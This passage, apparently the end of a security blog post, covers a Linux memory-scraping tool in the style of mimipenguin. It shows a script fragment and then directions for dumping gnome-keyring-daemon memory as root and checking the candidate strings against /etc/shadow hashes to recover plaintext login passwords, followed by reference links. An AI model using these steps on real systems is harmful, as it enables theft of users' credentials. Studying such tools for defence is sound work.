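    return [s for s in hits if s.encode() == secret]


if __name__ == "__main__":
    for s in demo_self_scan():
        print("found in own memory:", s)
```

To reproduce the script's GNOME case, run harvest(pid, r"^\$.\$") as root against the gnome-keyring-daemon PID and feed the candidates returned into a crypt(3) comparison with the user's /etc/shadow entry; the anon_only filter keeps the dump to heap, stack and anonymous mappings, which is where the keyring and PAM keep the plaintext, and avoids reading every mapped library.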

 

Usage example (screenshot not reproduced here):

 

 

0x06 References

https://www.secpulse.com/archives/6301.html

https://www.cnblogs.com/hiccup/p/4380298.html

https://blog.csdn.net/cao2110/article/details/51830975

http://www.freebuf.com/sectool/131165.html

